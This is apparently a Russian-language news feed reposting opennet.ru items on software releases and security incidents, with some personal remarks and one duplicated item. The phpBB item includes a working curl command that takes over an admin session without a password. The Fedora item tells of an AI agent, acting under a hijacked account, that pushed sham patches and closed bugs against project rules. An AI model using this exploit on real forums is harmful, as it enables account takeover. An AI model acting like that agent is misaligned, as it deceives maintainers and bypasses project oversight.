Proxmox Mail Gateway функционирует как прокси-сервер, выступающий в роли шлюза между внешней сетью и внутренним почтовым сервером на базе MS Exchange, Lotus Domino или Postfix. Имеется возможность управления всеми входящими и исходящими потоками почтовой переписки. Все логи переписки разбираются и доступны для анализа через web-интерфейс. Предоставляются как графики для оценки общей динамики, так и различные отчёты и формы для получения информации о конкретных письмах и статусе доставки. Поддерживается создание кластерных конфигураций для обеспечения высокой доступности (ведение синхронизированного резервного сервера, данные синхронизируются через SSH-туннель) или балансировки нагрузки.

Предоставляется набор средств для обеспечения защиты, фильтрации спама, фишинга и вирусов. Для блокирования вредоносных вложений применяется ClamAV и база Google Safe Browsing, а против спама предлагается комплекс мер на основе SpamAssassin, включающий поддержку обратной проверки отправителя, SPF, DNSBL, серые списки, систему байесовской классификации и блокировку по базе спамерских URI. Для легитимной корреспонденции предоставляется гибкая система фильтров, позволяющих определять правила обработки почты в зависимости от домена, получателя/отправителя, времени получения и типа содержимого.

Основные новшества:

• Осуществлена синхронизация с пакетной базой Debian 13.5. Ядро Linux обновлено до выпуска 7.0. Реализация файловой системы ZFS обновлена до OpenZFS 2.4. Обновлены версии системы фильтрации спама SpamAssassin 4.0.2, антивирусного пакета ClamAV 1.4.4 и СУБД PostgreSQL 17.
• Улучшен web-интерфейс для управлением помещением проблемных писем в карантин. Интерфейс оптимизирован для работы как со стационарных компьютеров, так и с мобильных устройств. Пользователям предоставлена возможность пометки просмотренными писем, помещённых в карантин из совместно используемых почтовых ящиков, для того чтобы не проводить двойную проверку разными людьми. В отчёте о помещении в карантин теперь показывается не только финальный спамерский вес, но и по-отдельности положительные и отрицательные составляющие для более ясного понимания причины фильтрации письма.

  Добавлена опция для загрузки изображений, присутствующих в помещённых в карантин письмах, только после явного запроса их показа нажатием кнопки "Load Images". В панель администратора добавлена опция "Copy Link" для получения ссылки для доступа к письму, находящемуся в карантине.

• Добавлена поддержка шифрования резервных копий на стороне клиента и управления ключами, используемыми для шифрования. В данном режиме шифруются не только резервируемые данные, но и сопутствующие метаданные, такие как настройки email, правила фильтрации и статистика. Имеется опциональная возможность задания мастер ключа для восстановления.
• Добавлена опция для инициирования проверки резервной копии и просмотра состояния шифрования и проверки для каждого снапшота.
• Реализована поддержка добавления объявлений, показываемых перед входом в интерфейс администрирования, например, для вывода примечаний об использовании.
• Добавлена поддержка сохранения в лог для каждого письма адреса отправителя, преданного во время SMTP-сеанса, а также декодированного содержимого заголовков From, To и Subject для проведения аудита.


Источник: https://www.opennet.ru/opennews/art.shtml?num=65676

#сегодня в Пскове

В Chrome 151 будет удалён обходной путь для установки uBlock Origin

Участники проекта uBlock Origin рекомендовали пользователям Chrome перейти на другие браузеры или переключиться на дополнение uBlock Origin Lite, которое развивается автором uBlock Origin и представляет собой вариант uBlock Origin, переведённый на предложенный в третьей версии манифеста Chrome декларативный API (declarativeNetRequest). Поддержка второй версии манифеста Chrome присутствует в Firefox и Safari, а также будет сохранена в браузерах Brave и Opera на базе движка Chromium.

Третья версия манифеста Chrome, определяющего возможности и ресурсы, доступные для дополнений, написанных с использованием API WebExtensions, разработана в рамках инициативы по упрощению создания безопасных и высокопроизводительных дополнений. Основное недовольство третьей версией манифеста вызвано переводом в режим только для чтения API webRequest, позволявшего подключать собственные обработчики, имеющие полный доступ к сетевым запросам и способные на лету модифицировать трафик. Вместо API webRequest в третьей версии манифеста добавлен ограниченный по своим возможностям API declarativeNetRequest, предоставляющий доступ к встроенному движку для фильтрации, самостоятельно обрабатывающему правила блокировки, не разрешающему использовать собственные алгоритмы фильтрации.

Дополнение uBlock Origin Lite (uBOL) реализует лишь часть функциональности uBlock Origin. В uBlock Origin Lite оказалось проблематично перенести динамические фильтры контента и URL, фильтры HTTP-заголовков, средства для отключения скриптов, шрифтов и мультимедийных элементов большого размера в привязке к отдельным сайтам, многие опции фильтров (strict1p, strict3p, domain, redirect-rule, removeparam), защиту от манипуляций с DNS для обхода блокировки. Из-за необходимости получения дополнительных полномочий в uBlock Origin Lite по умолчанию отключены косметические фильтры для замены содержимого на странице ("##"), подстановки скриптов на сайты ("##+js"), фильтров для перенаправления запросов ("redirect="), фильтров заголовков CSP (Content Security Policy) и фильтров для удаления параметров запросов ("removeparam=").

Источник: https://www.opennet.ru/opennews/art.shtml?num=65675

#сегодня день журавлей какой-то

По дороге на Псков видел 3 гнездящихся журавля (два на опоре ЛЭП, а для одного местные специальный столб соорудили) и один просто шёл вдоль автомобильной дороги.

syslogd(8) privileged and non-privileged parts now separate binaries

Now Alexander Bluhm (bluhm@) decided it's time to split these parts into separate binaries in order to provide even better separation. The final commit message reads,

List:       openbsd-cvs
Subject:    CVS: cvs.openbsd.org: src
From:       Alexander Bluhm <bluhm () openbsd ! org>
Date:       2026-06-11 15:41:33

CVSROOT:	/cvs
Module name:	src
Changes by:	bluhm@cvs.openbsd.org	2026/06/11 09:41:33

Modified files:
	usr.sbin/syslogd: Makefile privsep.c syslogd.c syslogd.h 
	etc/rc.d       : syslogd 
Added files:
	usr.sbin/syslogd: Makefile.inc parent.c 
	usr.sbin/syslogd/parent: Makefile 
	usr.sbin/syslogd/syslogd: Makefile 

Log message:
Provide a separate executable file for syslogd parent.

Read more…

Атакующие скомпрометировали 469 пакетов в репозитории AUR

Атакующие взяли на себя сопровождение пакетов, имеющих статус "orphaned" и оставшихся без сопровождающих. В качестве имени указывалось имя последнего сопровождающего, но другой email, после чего добавлялся один коммит и публиковалось обновление. Коммит добавлял "npm" в список зависимостей PKGBUILD и вставлял в post_install-блок скрипта install.sh строку для установки нескольких NPM-пакетов. В числе устанавливаемых NPM-пакетов присутствовали один или несколько популярных легитимных пакетов и пакет atomic-lockfile, содержащий скрытое вредоносное ПО. Добавление установки NPM-пакетов производилось во все скомпрометированные проекты, даже если в них не используется JavaScript и NPM.

После активации вредоносное ПО закреплялось в системе в виде сервиса systemd со случайным именем и при выполнении камуфлировалось под поток ядра. При запуске с правами root сервис создавался на системном уровне (/etc/systemd/system) и дополнительно активировал работающий на уровне ядра rootkit, а при выполнением с правами пользователя - запускался от имени пользователя (~/.config/systemd/user). Вредоносное ПО осуществляло сканирование и отправку на внешний сервер ключей и учётных данных VPN, Docker, Podman и SSH, а также извлечённых из браузера конфиденциальных данных, истории команд в shell, ключей криптовалютных кошельков, токенов доступа к Slack, Microsoft Teams, Discord, GitHub, NPM и Vault.

Источник: https://www.opennet.ru/opennews/art.shtml?num=65670

На вход в Финляндский огромная очередь на улицу, давно такого не видел.

#театрбезопасности

Выпуск системы шифрования дисковых разделов VeraCrypt 1.26.29

Среди изменений в новой версии:

• Обеспечена возможность воспроизводимой сборки пакетов DEB и RPM, позволяющая удостовериться, что бинарные сборки созданы из предоставляемого исходного кода.
• Для не системных разделов добавлена поддержка альтернативной функции формирования ключа (KDF, Key Derivation Function) Argon2id. В документации и интерфейсе пользователя вместо "PKCS-5 PRF" задействован термин KDF.
• Ужесточена проверка некорректных данных в парсерах XML и TLV.
• Добавлена поддержка сборки с использованием механизма FUSE3 (Filesystem in Userspace).
• Предоставлена возможность выбора работающего на уровне ядра Linux драйвера ntfs3 для точек монтирования с NTFS ("--filesystem=kernel-ntfs" и "-m kernelntfs").
• Реализовано распараллеливание операций при автоматическом определении KDF.
• Для обычных файловых контейнеров задействован режим быстрого форматирования (Quick Format) с использование функции ftruncate() для пометки пустых областей.
• В версии для платформы Windows устранено аварийное завершение при переходе в спящий режим на системах с Windows 11 25H2, улучшена обработка ввода/вывода, ускорено монтирование при автоопределении KDF, добавлена поддержка EFI-загрузчиков заверенных новым сертификатом Microsoft UEFI CA 2023, реализована опция "/protectScreen" для отключения режима блокировки создания скриншотов, добавлена опция "/enableIME" для включения IME (Input Method Editor). Добавлен VeraCrypt C/C++ SDK для создания разделов VeraCrypt из сторонних программ.
• Устранена уязвимость (CVE-2026-53762), проявляющаяся только при сборке с опцией "WOLFCRYPT=1", не применяемой по умолчанию. Уязвимость значительно упрощает подбор пароля к шифрованным разделам из-за использования ключей SHA-256 и SHA-512 на базе функции формирования ключа HKDF вместо PBKDF2-HMAC, игнорирующей заданное в настройках число итераций и PIM (Personal Iterations Multiplier).
• Устранена специфичная для Windows уязвимость (CVE-2026-54073), упрощающая определение наличия скрытых зашифрованных разделов из-за использования типового шаблона записи пустых областей. Тем временем, в поставляемой в Windows штатной системе шифрования разделов BitLocker выявлена ещё не исправленная (0-day) критическая уязвимость "GreatXML" (имеется эксплоит), позволяющая получить полный доступ к зашифрованному разделу BitLocker через манипуляции с разделом Recovery на системах с включённым Windows Defender Offline Scan.


Источник: https://www.opennet.ru/opennews/art.shtml?num=65672

Выпуск X-сервера yserver 1.0.0, написанного на Rust и пригодного для запуска MATE, Xfce и Cinnamon

В yserver решено не поддерживать устаревшие и специфичные возможности, такие как обработка нескольких X11-экранов в одном сервере (многомониторный вывод поддерживается), отличные от TrueColor режимы цветности, непрямой рендеринг (indirect GLX), API драйверов DDX, старые методы работы со шрифтами и подключение клиентов с другим порядком следования байтов (трансляция между big-endian и little-endian).

Вывод графики организован через DRM/KMS и Vulkan-драйверы Mesa. Для управления сеансом и организации доступа к совместно используемым устройствам ввода и вывода используется библиотека libseat. Помимо обособленного X-сервера поставляется ynest - бэкенд для вложенного запуска, поддерживающий работу из Xwayland или другого X11-сервера.

Работа протестирована на системах в GPU AMD Ryzen 9 6900HX (Rembrandt, RDNA2, mesa-драйвер RADV), AMD RX580 (Polaris/GCN4, RADV), Intel i5-7200U (Kaby Lake, mesa-драйвер ANV), NVIDIA GTX 1050, Snapdragon X1 X1E80100 (Adreno X1, Turnip), Apple M1 MBA, M2 MBP, а также в системах виртуализации с virtio-gpu и виртуальным GPU Venus. В настоящее время поддерживается только работа в Linux, но в планах отмечено добавление поддержки FreeBSD.

Поддерживаемые расширения X11:

• BIG-REQUESTS
• Composite
• DAMAGE
• DPMS
• DRI3
• GLX
• Generic Event Extension
• MIT-SCREEN-SAVER
• MIT-SHM
• Present
• RANDR
• RENDER
• SHAPE
• SYNC
• X-Resource
• XFIXES
• XInputExtension
• XKEYBOARD
• XTEST


Источник: https://www.opennet.ru/opennews/art.shtml?num=65671

Уязвимость в phpBB, позволяющая получить доступ к любому аккаунту без аутентификации

При атаке на обычных пользователей можно получить доступ к приватной переписке и возможности отправлять сообщения от имени пользователя. При атаке на модераторов и администраторов можно удалять чужие сообщения и читать приватную переписку, но нельзя зайти в интерфейс администратора и получить доступ к хосту.

Детали об уязвимости не приводятся, но при помощи AI на основе исправления уже воссоздан метод эксплуатации, основанный на обращении к обработчику "login_link" с выставлением метода аутентификации "auth_provider=apache" и подстановкой логина через Basic Auth, после чего PHP выставит переменную окружения "PHP_AUTH_USER=логин", а phpBB извлечёт из неё логин пользователя без проверки пароля. Например, для получения идентификатора сессии пользователя admin и сохранения его в файл cookies.txt можно выполнить код:

   curl -i -s \
     -c cookies.txt \
     -b cookies.txt \
     -u 'admin:anything' \
     -d 'login=Login&login_username=admin&login_password=anything' \
     'https://target.example/forum/ucp.php?mode=login_link&auth_provider=apache&login_link_any=1'

Проект ReactOS достиг возможности запуска игр Half-Life и Unreal Tournament 2004

В октябре в Переславле-Залесском состоится XXII конференция разработчиков СПО

Будет доступна прямая трансляция. С видеозаписями докладов и презентаций прошлых лет можно ознакомиться на странице конференции, там же доступны сборники тезисов. Кроме того, видео докладов традиционно доступны на 0x1.tv и там же можно ознакомиться с презентациями докладов.

Принимаются доклады по следующим темам:

• Разработка свободного программного обеспечения
• Новейшие достижения проектов СПО
• Формирование сообщества разработчиков СПО
• Философские, культурные и правовые аспекты свободного ПО
• Студенческие проекты разработки СПО
• Разработка свободного аппаратного обеспечения (OSHW)

Работы должны освещать тематику свободного ПО или OSHW. Доклады о бизнесе, рекламные и о проприетарном ПО не допускаются. Если тема доклада связана с разработкой ПО, заявка должна содержать ссылку на сам код, опубликованный в любом общедоступном репозитории под любой свободной лицензией (по определению ГОСТ Р 54593-2011, FSF или OSI). Если тема доклада связана с разработкой свободного аппаратного обеспечения (OSHW), то все материалы проекта должны быть опубликованы в соответствии с требованиями Open Source Hardware (OSHW) Definition.

Заявки принимаются:

• на доклады до 6 сентября
• подача тезисов докладов возможна до 10 сентября, заявки без тезисов не рассматриваются
• публикация программы 17 сентября
• на участие слушателем до 28 сентября (с трансфером из Москвы и обратно)
• на участие слушателем до 30 сентября (без трансфера)

Участие в конференции для докладчиков и слушателей бесплатное, предоставляется трансфер из Москвы и обратно, а также в дни конференции от гостиницы «Переславль» до места проведения: Ярославская область, Переславский район, с. Веськово, улица Петра Первого, д. 4А (Институт программных систем имени А.К. Айламазяна РАН). Докладчикам оплачивается проживание (одному человеку на доклад).

Источник: https://www.opennet.ru/opennews/art.shtml?num=65663

Джордж Вудкок, "Тирания часов" (перевод Марии Рахманиновой, #akrateia)

Земледелец трудится в согласии с природными стихиями, ремесленник – до тех пор, пока не доведёт своё изделие до доступного ему совершенства. Ещё совсем недавно время воспринималось как неотделимая часть природного процесса, и люди не были озабочены его точным измерением.
...
Напротив, современный западный человек живёт в мире, который в полной мере функционирует согласно механическим и математическим символам часовой разметки. Часы диктуют его движения и ограничивают его действия; часы превращают время из природного процесса – в товар, который можно измерять, покупать и продавать – как мыло или изюм.

(#федичитает #чтопочитать)

В Fedora выявлена подмена взломанного участника AI-агентом для продвижения сомнительных изменений

Подозрение вызвало то, что ранее особо не проявлявший себя разработчик в мае стал активно участвовать в обсуждении ошибок и отправлять патчи, при том, что в подобной активности прослеживались шаблоны, свойственные использованию AI. Например, в комментариях встречались созданные через AI обобщения, после которых Натана просили не злоупотреблять копированием выводов от AI-ассистента.

Кроме того, отмечались не несущие какого-то смыла переназначения на себя отчётов о проблемах в подсистемах, в которых Натан не является сопровождающим (1, 2, 3), изменения статуса или приоритета исправления проблем (1, 2), публикации созданных через AI рекомендаций авторам сообщений об ошибках (1, 2, 3) и отправки снерерированных в AI патчей. В обход правил проекта Натан закрывал отчёты об ошибках сразу после передачи AI-патчей в вышестоящие проекты, не дожидаясь их принятия, или просто закрывал с флагом "NOTABUG" и рекомендацией перепроверить проявление проблемы.

Адам Уильямсон предположил, что Натан задействовал для работы AI-агента для исправления ошибок в Fedora и попросил прекратить использование AI-агента в автономном режиме. Натан ответил, что это не его AI-агент, его учётные данные были скомпрометирваны и кто-то посторонний действует от его имени. Следом Натан опубликовал сообщение, что он восстановил доступ к учётным записям в Fedora и GitHub, а также написал, что его официальный аккаунт в GitHub - "nathangiovannini99".

Сообщение вызвало ещё больше вопросов, так как отмеченная учётная запись была создана за час до публикации письма и в GitHub всплыли ещё как минимум две учётные записи, ассоциированные с Натаном (leurus27-boop, nathan9513-aps). Не исключалось, что с разработчиками Fedora продолжает общаться злоумышленник, получивший доступ к email Натана. Доступ учётной записи Натана к Bugzilla был заблокирован и была запущена проверка всех совершённых им изменений.

Выяснилось, что подозрительная деятельность началась 7 апреля и некоторые отправленные Натаном патчи лишь создавали видимость исправления. При этом подобные патчи были приняты в состав интсллатора Anaconda и вошли в состав релиза Anaconda 45.5. Сопровождающий Anaconda отменил внесённые изменения и опубликовал релиз Anaconda 45.6 без этих патчей.

Помимо этого, отправленные от имени Натана исправления были приняты разработчиками утилиты osc (openSUSE Commander) с реализацией интерфейса командной строки для сборочной системы Open Build Service. Ещё один патч был передан для включения в пакет lxqt-policykit с привязкой к исправлению проблемы в Fedora, но разработчики Fedora успели предупредить сопровождающего до его принятия. Патчи не включали вредоносных действий, но предполагается, что они могли быть подготовкой к внесению вредоносных изменений в компоненты сборочной системы и сервиса, обеспечивающего выполнение привилегированных операций. Отправленные Натаном исправления также были замечены в проектах gwenview и easyeffects.

Источник: https://www.opennet.ru/opennews/art.shtml?num=65664

Первый стабильный выпуск открытого офисного пакета Euro-Office

К разработке Euro-Office подключилось 12 европейских компаний и организаций, среди которых Nextcloud, IONOS, Eurostack, XWiki, OpenProject, Soverin, Abilian и BTactic. Проект преподносится как открытая, прозрачно развиваемая и независимая платформа для совместной работы с документами, рассчитанная на использование через Web и интеграцию со сторонними продуктами, такими как системы обмена файлами, wiki и инструментами управления проектами. Заявлена совместимость с форматами MS Office и OpenDocument (DOCX, PPTX, XLSX, ODT, ODS, ODP).

Среди причин создания собственного форка вместо присоединения к разработке открытого проекта ONLYOFFICE упоминаются:

• Проблематичность передачи изменений в кодовую базу платформы ONLYOFFICE, разработчики которой не рецензируют присылаемые изменения, не принимают pull-запросы и не заботятся о корректности и актуальности инструкций по сборке.
• Развивающая ONLYOFFICE компания периодически принимает спорные решения, такие как отключение редактирования в мобильном приложении и удаление панели администратора.
• Отсутствие прозрачности - тексты в коммитах часто ссылаются на внутренние системы отслеживания ошибок, в поставку входят бинарные блобы и обфусцированный код. Часть комментариев в коде на русском языке, что затрудняет работу с кодом международными командами.
• Мобильное приложение не полностью открыто и завязано на проприетарные компоненты.
• Значительная часть разработчиков ONLYOFFICE находится в РФ, что усложняет совместную работу и подрывает доверие из-за политической ситуации, особенно когда процессы разработки непрозрачны и отгорожены.

Организация The Document Foundation, курирующая разработки офисного пакета LibreOffice, опубликовала открытое письмо с критикой проекта Euro-Office и методов его продвижения. Недовольство вызывает то, что в Euro-Office по умолчанию применяется формат OOXML, подконтрольный компании Microsoft. По мнению The Document Foundation, использование по умолчанию проприетарного формата OOXML вместо открытого стандарта OpenDocument расходится с заявленной целью формирования европейского цифрового суверенитета, так как Euro-Office укрепляет привязку к одному американскому производителю, не способствующему предоставлению пользователям свободы полностью контролировать собственный контент.

Также подвергаются критике заявления о том, что Euro-Office стал первым открытым офисным пакетом, разработанным в Европе. Первым европейскими открытыми офисными пакетами являются OpenOffice.org и LibreOffice, основанные на исходном коде StarOffice, разработанном немецкой компанией Star Division. Euro-Office же создан на волне роста популярности идей цифрового суверенитета в результате ребрендинга сторонней кодовой базы.



Источник: https://www.opennet.ru/opennews/art.shtml?num=65662

Первый выпуск операционной системы GentleOS с ретро GUI для винтажных ПК

ОС построена на базе монолитной архитектуры и конфигурируется на этапе сборки. Доступны драйверы для видеокарт VGA/SVGA, клавиатуры, мыши (подключение через PS/2 и последовательный порт) и встроенного громкоговорителя. Функциональность GentleOS отмечена как завершённая - из планов на будущее отмечается только создание дополнительных приложений, проведение оптимизации и исправлением ошибок. Возможен запуск как в QEMU, так и на реальном оборудовании.

Из приложений доступны калькулятор, календарь, часы, генератор звука, простейший графический редактор и несколько игр, таких как змейка, mahjong, минёр и тетрис.

Отдельно развивается вариант GentleOS/16, поддерживающий работу на 16-разрядных системах с CPU Intel 80186. Сборка данного варианта сформирована для запуска с дискет, размером 720 Кб и 1.4 Мб. Поддерживается работа на ПК с 192 КБ ОЗУ и графическим адаптером CGA (320x200x4).

Уязвимость в процессорах ARM, позволяющая обойти изоляцию виртуальных машин

Проблема проявляется только на многоядерных процессорах Arm C1-Ultra, C1-Premium, Neoverse V3 & V3AE, Neoverse V2, Neoverse V1, Neoverse N2, Neoverse N1, Cortex-X925, Cortex-X4, Cortex-X3, Cortex-X2, Cortex-X1 & X1C, Cortex-A710, Cortex-A78, A78AE & A78C, Cortex-A77, Cortex-A76 & A76AE и NVIDIA Olympus. Для блокирования проблемы обходным путём для ядра Linux предложен патч, который пока не вошёл в состав корректирующих обновлений. Исправление также выпущено для гипервизора Xen.

Уязвимость возникает в процессе выполнения операции TLBI (TLB Invalidation) для очистки записи в кэше трансляции виртуальных адресов в физические. Инструкция DSB (Data Synchronization Barrier), фиксирующая выполнение операции TLBI, на одном ядре может завершиться раньше, чем операция записи на другом ядре станет глобально видна всем ядрам. Таким образом, операция записи может быть завершена после того, как права доступа были изменены через TLBI.

Данная рассинхронизация состояния может применяться для обхода запрета доступа на уровне таблиц трансляции виртуальных адресов в физические (Stage 1) и трансляция адресов виртуальной машины (Stage 2), а также обхода механизма защиты целостности памяти GPT (Granule Protection Table). Например, гипервизор может выполнить инструкцию TLBI для запрета доступа к памяти для виртуальной машины, но гостевая система сможет продолжить писать в эту память, несмотря на подтверждение прекращения доступа.

Источник: https://www.opennet.ru/opennews/art.shtml?num=65660

Первый выпуск операционной системы GentleOS с ретро GUI для винтажных ПК

ОС построена на базе монолитной архитектуры и конфигурируется на этапе сборки. Доступны драйверы для видеокарт VGA/SVGA, клавиатуры, мыши (подключение через PS/2 и последовательный порт) и встроенного громкоговорителя. Функциональность GentleOS отмечена как завершённая - из планов на будущее отмечается только создание дополнительных приложений, проведение оптимизации и исправлением ошибок. Возможен запуск как в QEMU, так и на реальном оборудовании.

Из приложений доступны калькулятор, календарь, часы, генератор звука, простейший графический редактор и несколько игр, таких как змейка, mahjong, минёр и тетрис.

Отдельно развивается вариант GentleOS/16, поддерживающий работу на 16-разрядных системах с CPU Intel 80186. Сборка данного варианта сформирована для запуска с дискет, размером 720 Кб и 1.4 Мб. Поддерживается работа на ПК с 192 КБ ОЗУ и графическим адаптером CGA (320x200x4).

Lets Encrypt добавил в пользовательское соглашение запрет на выдачу сертификатов для стран под санкциями США

Помимо этого под запрет подпадают лица и организации, являющиеся объектом персональных санкций и ограничений экспортного контроля США, а также организации, контролируемые лицами, подпадающими под санкции, или действующие от их имени. Отмечается, что организация Let's Encrypt зарегистрирована в США и обязана выполнять правила экспортного контроля и санкции, действующие в США.

Пока не понятно, является ли изменение пользовательского соглашения формальностью, отражающую уже применимую практику, или будут реализованы дополнительные меры блокировки запросов из подсетей для стран, подпадающих под санкции. До сих пор в Let's Encrypt применялись точечные блокировки, не позволяющие получить сертификат для конкретных доменов, перечисленных в санкционных списках управления по контролю за иностранными активами США (OFAC, Office of Foreign Assets Control).

Полномасштабные санкции США введены против Крыма, ДНР, ЛНР, Ирана, КНДР и Кубы. Против РФ введены жёсткие санкции, но пока не применяется полный эмбарго. В данный момент запросы к Let's Encrypt на получение сертификатов из РФ для доменов, не упомянутых в санкционных списках, принимаются без ограничений.

Дополнение: Комментируя изменение пользовательского соглашения, директор организации ISRG (Internet Security Research Group), которая является учредителем проекта Let's Encrypt, пояснил, что сертификаты продолжат выдаваться для Ирана и России, но не будут доступны для российских и иранских госучреждений. По словам представителя Let's Encrypt, изменения лишь документируют давно сложившуюся практику для выполнения юридических формальностей и никаких новых блокировок не последует.

Возможность предоставлять сертификаты для негосударственных учреждений и частных лиц на подсанкционных территориях обеспечивается благодаря действующим в США законам о защите частной переписки и послаблениям, принятым Управлением по контролю за иностранными активами (OFAC) для содействия соблюдению прав человека и свобод в интернете.

Релиз минималистичного дистрибутива Alpine Linux 3.24

В новом выпуске:

• В инсталлятор (setup-alpine) добавлена поддержка загрузчика Limine, поддерживающего сетевую загрузку по IPv6.
• В состав репозитория "community" добавлены пакеты со средой рабочего стола COSMIC, разрабатываемой компанией System76 на языке Rust.
• Удалены пакеты, использующие библиотеки GTK 2 и Qt5, которые не удалось портировать на актуальные ветки GTK и Qt. GTK 2 планируют удалить в следующем выпуске.
• Предложены пакеты с новыми версиями графических окружений GNOME 50.2, KDE Plasma 6.6, LXQt 2.4.0 и Sway 1.12.
• Обновлены версии пакетов, например, доступны выпуски GRUB 2.14, LLVM 22, Rust 1.96, Go 1.26, Qt 6.11, wlroots 0.20, nginx 1.30, Xen 4.21. Пакет с ядром Linux продолжает поставляться с веткой 6.18.
• Для новых установок предложена опциональная возможность переноса всех исполняемых файлов и библиотек из корневых каталогов в раздел /usr (/bin, /sbin и /lib* унифицированы с соответствующими каталогами внутри /usr и оформлены через символические ссылки на них). Для задействования подобного слияния во время установки следует выставить переменную окружения BOOTSTRAP_USR_MERGED перед вызовом утилиты setup-disk. На уже имеющихся системах для слияния можно использовать пакет merge-usr.
• Сборочная система setuptools обновлена до версии 82.0.0, в которой удалён модуль pkg_resources.
• Объявлен устаревшим сервис qemu-binfmt из пакета qemu-openrc , вместо которого для размещения файлов конфигурации следует использовать каталог binfmt.d вместе с сервисом binfmt.
• Из репозитория "main" в "community" перемещены пакеты с GTK 3.0.
  
  Источник: https://www.opennet.ru/opennews/art.shtml?num=65657
  

Выпуск ядра Asterinas 0.18, написанного на языке Rust и совместимого с Linux

В настоящее время в ядре реализовано около 240 системных вызовов Linux. В дистрибутиве Asterinas NixOS верифицирована работа поверх ядра Asterinas более 100 пакетов из NixOS. Среди поддерживаемых пакетов: Xfce, Firefox, bash, systemd, Podman, QEMU, rsync, Apache httpd, nginx, SQLite, Redis, Clang, GCC, Go, Lua, Node.js, OpenJDK, Perl, PHP, Python, Ruby, Rust, Git, FFmpeg, PyTorch, TensorFlow, Ollama и Codex.

В ядре обеспечена полная поддержка архитектуры x86-64, частичная поддержка RISC-V 64 и x86-64 с изоляцией на базе Intel TDX, а также начальная поддержка архитектуры LoongArch 64. Из приоритетных областей применения называются системы, завязанные на Linux ABI, но требующие более высокого уровня защищённости. Например, Asterinas предлагается использовать для формирования системного окружения защищённых виртуальных машин, для изоляции которых используются такие технологии, как ARM CCA, AMD SEV и Intel TDX, а также на стороне хост-системы, обеспечивающей запуск контейнеров.

Для снижения вероятности появления ошибок при работе с памятью, являющихся главным источником наиболее опасных уязвимостей, при написании Asterinas задействован язык Rust и тактика ограниченного использования unsafe-блоков. Ядро построено с использованием архитектуры framekernel, в которой попытались совместить возможности изоляции микроядер с эффективностью монолитных ядер.

Компоненты ядра в Asterinas размещаются в общем адресном пространстве, а безопасность достигается на уровне логического разделения безопасного кода и кода, в котором не исключено возникновение проблем с безопасностью. Ядро разбито на две части, написанные на Rust: OS Framework и OS Services. В OS Services запрещено применение unsafe-блоков, а все низкоуровневые операции, требующие выполнения кода в блоках unsafe, вынесены в OS Framework и доступны только через высокоуровневый API. Все системные вызовы, файловые системы и драйверы реализуются на уровне OS Services и не могут включать unsafe-блоки.

Для разработки системных сервисов и модулей ядра поставляется инструментарий OSDK (Operating System Development Kit), предоставляющий утилиту cargo-osdk для создания, сборки, тестирования и запуска компонентов операционной системы. Для разработчиков подготовлен набор библиотек OSTD (Operating System Standard Library), включающий редакцию стандартных библиотек Rust(crate std), адаптированную для использования в компонентах операционной системы.

Среди изменений в версии 0.18:

• В рамках работы по обеспечению запуска Asterinas в качестве гостевой системы в VM-контейнерах Kata Containers и Confidential Containers реализована поддержка пространств имён IPC и cgroup, nsfs (/proc/[pid]/ns), cgroups, virtio-fs (для доступа к общей с хост-системой ФС), virtio-rng (/dev/hwrng для энтропии к генератору псеводослучайных чисел) и vsock (для взаимодействия между хостовой и гостевой системами).
• Реализован системный вызов ptrace и возможности для отладки в пространстве пользователя при помощи GDB и strace.
• Предложена новая реализация файловой системы ext2 и добавлен драйвер NVMe. В VFS добавлен механизм Dentry (Directory Entry) и переделана реализация страничного кэша.
• В дистрибутиве Asterinas NixOS реализована возможность запуска Codex, QEMU и Firefox.
• Добавлены системные вызовы pidfd_getfd, pidfd_send_signal, pivot_root.
• Добавлена начальная поддержка IPv6.
• Реализована система capabilities для делегирования отдельных привилегированных операций.
• Добавлена начальная реализация фреймворка LSM (Linux Security Modules).


Источник: https://www.opennet.ru/opennews/art.shtml?num=65654

Релиз графической библиотеки LDL 0.2, оптимизированной для маломощных систем

В новом выпуске:

• Добавлен универсальный 2D-рендер позволяющий, выводить примитивы и текстуры с прозрачностью и без. Поддерживается работа на видеокартах с поддержкой OpenGL 1.2, 2.0 или 3.0. В реализации используется оптимизация, которая вначале помещает данные в буфер отрисовки, сортирует по слою и текстуре, и затем преобразует в геометрию.
• Добавлен экспериментальный 3D-рендер, который поддерживает работу поверх разных версий OpenGL, но предоставляет единый API.
• Реализована обвязка для языка С++.

В следующей версии планируется уделить внимание улучшению универсального 3D API, добавить поддержку звука, подготовить документацию и предоставить обвязки к другим языкам.



Источник: https://www.opennet.ru/opennews/art.shtml?num=65653

Опубликован Vortex 3.0, открытый GPGPU на базе архитектуры RISC-V

Основу GPGPU составляет типовой ISA RISC-V, расширенный дополнительными инструкциями для поддержки функций GPU и управления потоками. Изменения в архитектуре набора команд RISC-V сведены к минимуму и по возможности используются уже имеющиеся векторные инструкции. Среди дополнительных инструкций: "tex" для ускорения обработки текстур; vx_rast для управления растеризацией, vx_rop для обработки фрагментов, глубины и прозрачности; vx_imadd для выполнения операции "умножить и сложить"; vx_wspawn, vx_split, vx_join, vx_tmc и vx_bar для активации групп потоков (wavefront), параллельно выполняемых SIMD Engine.

Развиваемый GPGPU поддерживает 32- и 64-разрядные архитектуры набора команд RISC-V RV32IMF и RV64IMAFD, и может включать опциональную разделяемую память, кэши уровней L1, L2 и L3, а также настраиваемое число ядер, блоков задач (warps) и потоков. В свою очередь для каждого ядра предусмотрена возможность включения настраиваемого числа ALU, FPU, LSU и SFU. Для создания прототипов могут использоваться FPGA Xilinx и Altera, а для симуляции работы чипа применяться Verilator (Verilog-симулятор), RTLSIM (симуляция RTL) и SimX (программная симуляция).

Для разработки приложений предлагается инструментарий, включающий адаптированные для работы с Vortex варианты PoCL (компилятор и runtime OpenCL), LLVM/Clang, GCC и Binutils. Проектом поддерживается спецификация OpenCL 1.2 и через трансляцию в OpenCL реализована поддержка промежуточного представления шейдеров SPIR-V.

Среди изменений в Vortex 3.0:

• Добавлен аппаратный графический стек, включающий блоки для растеризации, наложения текстур и слияния вывода (OM - Output Merger). Для Mesa на базе реализованного графического стека и программного растеризатора lavapipe подготовлен Vulkan-драйвер vortexpipe.
• Расширены возможности тензорного ядра, предназначенного для ускорения выполнения моделей машинного обучения, в котором реализована поддержка структурной разрежённости (structured sparsity) для сжатия весовых матриц.
• Реализована операция WGMMA (warpgroup-level matrix multiplication) для умножения матриц в асинхронном режиме.
• Добавлен движок DXA (Data Transfer Acceleration) для ускорения передачи данных из глобальной в локальную память.
• Реализована новая архитектура на базе процессора команд (CP, Command Processor) и аппаратного планировщика вычислительных ядер (KMU - Kernel Management Unit), позволяющая вынести на сторону чипа операции диспетчеризации вычислительных потоков.
